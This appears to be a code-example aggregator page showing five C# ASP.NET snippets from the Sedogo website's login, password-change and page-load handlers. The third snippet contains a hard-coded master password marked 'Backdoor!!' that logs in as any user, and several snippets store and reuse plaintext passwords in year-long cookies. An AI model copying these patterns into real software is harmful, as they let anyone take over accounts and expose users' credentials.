Esempio n. 1
0
    //===============================================================
    // Function: saveChangesButton_click
    //===============================================================
    protected void saveChangesButton_click(object sender, EventArgs e)
    {
        string currentPassword = currentPasswordTextBox.Text.Trim();
        string userPassword = passwordTextBox1.Text.Trim();

        SedogoUser user = new SedogoUser(Session["loggedInUserFullName"].ToString(),
            int.Parse(Session["loggedInUserID"].ToString()));
        loginResults checkResult;
        checkResult = user.VerifyLogin((string)Session["loggedInUserEmailAddress"], currentPassword, false, true, "changePassword.aspx");
        if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
        {
            user.UpdatePassword(userPassword);

            Response.Redirect("profileRedirect.aspx");
        }
        else
        {
            Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"The current password is not correct.\");", true);
            SetFocus(currentPasswordTextBox);
        }
    }
Esempio n. 2
0
 /// <summary>
 /// Check the user's password
 /// </summary>
 /// <param name="emailAddress">email is the login</param>
 /// <param name="password">password</param>
 /// <param name="db">database access object</param>
 /// <param name="userId">output - user id</param>
 /// <param name="fullName">output - user's name</param>
 /// <returns>authentication is successful</returns>
 public static bool VerifyUserLogin(string emailAddress, string password, SedogoDBEntities db, out int? userId, out string fullName)
 {
     userId = null;
     fullName = null;
     var user = new SedogoUser("");
     var checkResult = user.VerifyLogin(emailAddress, password, false, true, "API. VerifyUserLogin");
     if ((checkResult == loginResults.loginSuccess))
     {
         userId = user.userID;
         fullName = user.firstName + " " + user.lastName;
         return true;
     }
     return false;
     /*System.Data.Objects.ObjectResult<spVerifyUserLogin_Result> lresult = db.spVerifyUserLogin(emailAddress);
     spVerifyUserLogin_Result loginResult = lresult.FirstOrDefault();
     if (loginResult != null && loginResult.UserPassword == password)
     {
         userID = loginResult.UserID;
         return true;
     }
     return false;
       */
 }
Esempio n. 3
0
    //===============================================================
    // Function: loginButton_Click
    //===============================================================
    public void loginButton_Click(object sender, EventArgs e)
    {
        string loginEmailAddress = emailAddress.Text;
        string loginPassword = userPassword.Text;
        Boolean rememberMe = rememberMeCheckbox.Checked;

        int redirectUserID = -1;
        int redirectUserTimelineID = -1;
        int redirectEventID = -1;
        string redirectPage = "";
        string redirectPageDetails = "";
        int redirectReplyID = -1;

        if (Request.QueryString["UID"] != null)
        {
            try
            {
                redirectUserID = int.Parse(Request.QueryString["UID"].ToString());
            }
            catch { }
        }
        if (Request.QueryString["UTID"] != null)
        {
            try
            {
                redirectUserTimelineID = int.Parse(Request.QueryString["UTID"].ToString());
            }
            catch { }
        }
        if (Request.QueryString["EID"] != null)
        {
            try
            {
                redirectEventID = int.Parse(Request.QueryString["EID"].ToString());
            }
            catch { }
        }
        if ((string)Session["EventID"] != "")
        {
            try
            {
                redirectEventID = int.Parse((string)Session["EventID"]);
            }
            catch { }
        }
        if ((string)Session["ReplyID"] != "")
        {
            try
            {
                redirectReplyID = int.Parse((string)Session["ReplyID"]);
            }
            catch { }
        }
        if (Request.QueryString["Redirect"] != null)
        {
            redirectPage = (string)Request.QueryString["Redirect"];
            if (Request.QueryString["Details"] != null)
            {
                redirectPageDetails = (string)Request.QueryString["Details"];
            }
        }

        HttpCookie cookie = new HttpCookie("SedogoLoginEmailAddress");
        // Set the cookies value
        cookie.Value = loginEmailAddress;

        // Set the cookie to expire in 1 year
        DateTime dtNow = DateTime.Now;
        cookie.Expires = dtNow.AddYears(1);

        // Add the cookie
        Response.Cookies.Add(cookie);

        if (rememberMe == true)
        {
            HttpCookie passwordCookie = new HttpCookie("SedogoLoginPassword");
            // Set the cookies value
            passwordCookie.Value = loginPassword;

            // Set the cookie to expire in 1 year
            passwordCookie.Expires = dtNow.AddYears(1);

            // Add the cookie
            Response.Cookies.Add(passwordCookie);
        }
        else
        {
            // Delete the password cookie
            HttpCookie passwordCookie = new HttpCookie("SedogoLoginPassword");
            // Set the cookies value
            passwordCookie.Value = "";

            // Set the cookie to expire in 1 year
            passwordCookie.Expires = dtNow.AddYears(1);

            // Add the cookie
            Response.Cookies.Add(passwordCookie);
        }

        SedogoUser user = new SedogoUser("");
        loginResults checkResult;
        checkResult = user.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx");

        // Backdoor!!
        if (loginPassword == "!!Sed0g0")
        {
            checkResult = loginResults.loginSuccess;
            int userID = SedogoUser.GetUserIDFromEmailAddress(loginEmailAddress);
            user = null;

            user = new SedogoUser("", userID);
        }

        if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
        {
            Session.Add("loggedInUserID", user.userID);
            Session.Add("loggedInUserFirstName", user.firstName);
            Session.Add("loggedInUserLastName", user.lastName);
            Session.Add("loggedInUserEmailAddress", user.emailAddress);
            Session.Add("loggedInUserFullName", user.firstName + " " + user.lastName);

            Session["EventID"] = "";
            Session["ReplyID"] = "";

            if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
            {
                //FormsAuthentication.RedirectFromLoginPage(loginEmailAddress, false);
                //FormsAuthentication.SetAuthCookie(loginEmailAddress, false);

                //Nikita Knyazev. Facebook authentication. Start.
                SaveFacebookID(user);
                //Nikita Knyazev. Facebook authentication. Finish
                if (redirectUserID > 0)
                {
                    string url = "./userProfileRedirect.aspx?UID=" + redirectUserID.ToString();
                    Response.Redirect(url);
                }
                else if (redirectUserTimelineID > 0)
                {
                    string url = "./userTimelineRedirect.aspx?UID=" + redirectUserTimelineID.ToString();
                    Response.Redirect(url);
                }
                else if (redirectEventID > 0)
                {
                    string url = "./viewEventRedirect.aspx?EID=" + redirectEventID.ToString();
                    Response.Redirect(url);
                }
                else if (redirectReplyID > 0)
                {
                    string url = "./message.aspx?ReplyID=" + redirectReplyID.ToString();
                    Response.Redirect(url);
                }
                else if (redirectPage == "AddEvent")
                {
                    Session["PageRedirect"] = "AddEvent";
                    Session["PageRedirectDetails"] = redirectPageDetails;

                    string url = "./profileRedirect.aspx";
                    Response.Redirect(url);
                }
                else
                {
                    string url = "./profileRedirect.aspx";
                    Response.Redirect(url);
                }
            }
            // This counts as a successful login, however force a password change
            //if (checkResult == loginResults.passwordExpired)
            //{
            //    FormsAuthentication.SetAuthCookie(loginEmailAddress, false);
            //    Response.Redirect("./myProfile/forceChangePassword.aspx");
            //}
        }
        //else
        //{
        if (checkResult == loginResults.loginFailed)
        {
            Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Username or password is not correct.\");", true);
        }
        if (checkResult == loginResults.loginNotActivated)
        {
            Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"This account has not yet been activated, please check your email.\");", true);
        }
        //}
    }
Esempio n. 4
0
    //===============================================================
    // Function: Page_Load
    //===============================================================
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
        {
            if (Session["ResetPassword"] != null)
            {
                string resetPassword = (string)Session["ResetPassword"];
                if (resetPassword == "Y")
                {
                    Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Your password has been reset and emailed to you.\");", true);
                    Session["ResetPassword"] = null;
                }
            }

            Session["EventID"] = "";
            Session["ReplyID"] = "";
            Session["MessageID"] = "";
            Session["EventInviteGUID"] = "";
            Session["EventInviteUserID"] = -1;
            Session["DefaultRedirect"] = "";
            if (Request.QueryString["EID"] != null)
            {
                Session["EventID"] = (string)Request.QueryString["EID"];
            }
            if (Request.QueryString["ReplyID"] != null)
            {
                Session["ReplyID"] = (string)Request.QueryString["ReplyID"];
            }
            if (Request.QueryString["MID"] != null)
            {
                Session["MessageID"] = (string)Request.QueryString["MID"];
            }
            if (Request.QueryString["EIG"] != null)
            {
                Session["EventInviteGUID"] = (string)Request.QueryString["EIG"];
            }
            if (Request.QueryString["UID"] != null)
            {
                Session["EventInviteUserID"] = int.Parse(Request.QueryString["UID"].ToString());
            }
            if (Request.QueryString["Redir"] != null)
            {
                Session["DefaultRedirect"] = Request.QueryString["Redir"].ToString();
            }

            HttpCookie emailCookie = Request.Cookies["SedogoLoginEmailAddress"];
            HttpCookie passwordCookie = Request.Cookies["SedogoLoginPassword"];
            // Check to make sure the cookie exists
            if (emailCookie != null && passwordCookie != null)
            {
                string loginEmailAddress = emailCookie.Value.ToString();
                string loginPassword = passwordCookie.Value.ToString();

                SedogoUser user = new SedogoUser("");
                loginResults checkResult;
                checkResult = user.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx cookie");

                if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
                {
                    Session.Add("loggedInUserID", user.userID);
                    Session.Add("loggedInUserFirstName", user.firstName);
                    Session.Add("loggedInUserLastName", user.lastName);
                    Session.Add("loggedInUserEmailAddress", user.emailAddress);
                    Session.Add("loggedInUserFullName", user.firstName + " " + user.lastName);

                    if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
                    {
                        string url = "./profile.aspx";
                        Response.Redirect(url);
                    }
                }
            }

            PopulateEvents();

            timelineURL.Text = "timelineHomePageXML.aspx?G=" + Guid.NewGuid().ToString();

            if ((string)Session["EventInviteGUID"] != "")
            {
                if ((int)Session["EventInviteUserID"] > 0)
                {
                    Response.Redirect("login.aspx");
                }
                else
                {
                    Response.Redirect("register.aspx");
                }
            }
            if ((string)Session["EventID"] != "")
            {
                Response.Redirect("login.aspx");
            }
            if ((string)Session["ReplyID"] != "")
            {
                Response.Redirect("login.aspx");
            }
            if ((string)Session["DefaultRedirect"] != "")
            {
                Response.Redirect("login.aspx");
            }

            //DateTime timelineStartDate = DateTime.Now.AddMonths(8);
            DateTime timelineStartDate = DateTime.Now.AddYears(4);

            timelineStartDate1.Text = timelineStartDate.ToString("MMM dd yyyy HH:MM:ss 'GMT'");     // "Jan 08 2010 00:00:00 GMT"
            timelineStartDate2.Text = timelineStartDate.ToString("MMM dd yyyy HH:MM:ss 'GMT'");

            eventRotator.DataSource = GetRotatorDataSource();
            eventRotator.DataBind();

            BindLatestMembers();
            PopulateLatestSearches();

            DbConnection conn = new SqlConnection(GlobalSettings.connectionString);
            try
            {
                conn.Open();

                DbCommand cmd = conn.CreateCommand();
                cmd.CommandType = CommandType.Text;
                cmd.CommandText = "SELECT HomePageContent FROM HomePageContent ";
                DbDataReader rdr = cmd.ExecuteReader();
                rdr.Read();
                homePageContent.Text = (string)rdr["HomePageContent"];
                rdr.Close();
            }
            catch (Exception ex)
            {
                ErrorLog errorLog = new ErrorLog();
                errorLog.WriteLog("", "", ex.Message, logMessageLevel.errorMessage);
                throw ex;
            }
            finally
            {
                conn.Close();
            }

            if (Request.QueryString["Tour"] != null)
            {
                if (Request.QueryString["Tour"].ToString() == "Y")
                {
                    Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert",
                        "$(document).ready(function() { showTour1(); });", true);
                }
            }
        }
    }
Esempio n. 5
0
    /// <summary>
    /// Handles the Load event of the Page control.
    /// </summary>
    /// <param name="sender">The source of the event.</param>
    /// <param name="e">The <see cref="System.EventArgs"/> instance containing the event data.</param>
    protected void Page_Load(object sender, EventArgs e)
    {
        if (IsPostBack)
        {
            return;
        }
        if (Session["ResetPassword"] != null)
        {
            var resetPassword = (string)Session["ResetPassword"];
            if (resetPassword == "Y")
            {
                Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert",
                                                        "alert(\"Your password has been reset and emailed to you.\");",
                                                        true);
                Session["ResetPassword"] = null;
            }
        }

        Session["EventID"] = "";
        Session["ReplyID"] = "";
        Session["EventInviteGUID"] = "";
        Session["EventInviteUserID"] = -1;
        Session["DefaultRedirect"] = "";
        if (Request.QueryString["EID"] != null)
        {
            Session["EventID"] = Request.QueryString["EID"];
        }
        if (Request.QueryString["ReplyID"] != null)
        {
            Session["ReplyID"] = Request.QueryString["ReplyID"];
        }
        if (Request.QueryString["EIG"] != null)
        {
            Session["EventInviteGUID"] = Request.QueryString["EIG"];
        }
        if (Request.QueryString["UID"] != null)
        {
            Session["EventInviteUserID"] = int.Parse(Request.QueryString["UID"]);
        }
        if (Request.QueryString["Redir"] != null)
        {
            Session["DefaultRedirect"] = Request.QueryString["Redir"];
        }

        var emailCookie = Request.Cookies["SedogoLoginEmailAddress"];
        var passwordCookie = Request.Cookies["SedogoLoginPassword"];
        // Check to make sure the cookie exists
        if (emailCookie != null && passwordCookie != null)
        {
            var loginEmailAddress = emailCookie.Value;
            var loginPassword = passwordCookie.Value;

            var user = new SedogoUser("");
            var checkResult = user.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx cookie");

            if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
            {
                Session.Add("loggedInUserID", user.userID);
                Session.Add("loggedInUserFirstName", user.firstName);
                Session.Add("loggedInUserLastName", user.lastName);
                Session.Add("loggedInUserEmailAddress", user.emailAddress);
                Session.Add("loggedInUserFullName", user.firstName + " " + user.lastName);

                if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
                {
                    const string url = "./profile.aspx";
                    if (Request.Url.LocalPath.EndsWith("default.aspx"))
                    {
                        Response.Redirect(url);
                    }
                }
            }
        }

        if ((string)Session["EventInviteGUID"] != "")
        {
            if ((int)Session["EventInviteUserID"] > 0)
            {
                Response.Redirect("login.aspx");
            }
            else
            {
                Response.Redirect("register.aspx");
            }
            //Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert",
            //                                        (int)Session["EventInviteUserID"] > 0
            //                                            ? "openModal(\"login.aspx\");"
            //                                            : "openModal(\"register.aspx\");", true);
        }
        if ((string)Session["EventID"] != "")
        {
            Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "openModal(\"login.aspx\");", true);
        }
        if ((string)Session["ReplyID"] != "")
        {
            Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "openModal(\"login.aspx\");", true);
        }
        if ((string)Session["DefaultRedirect"] != "")
        {
            Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "openModal(\"login.aspx\");", true);
        }
    }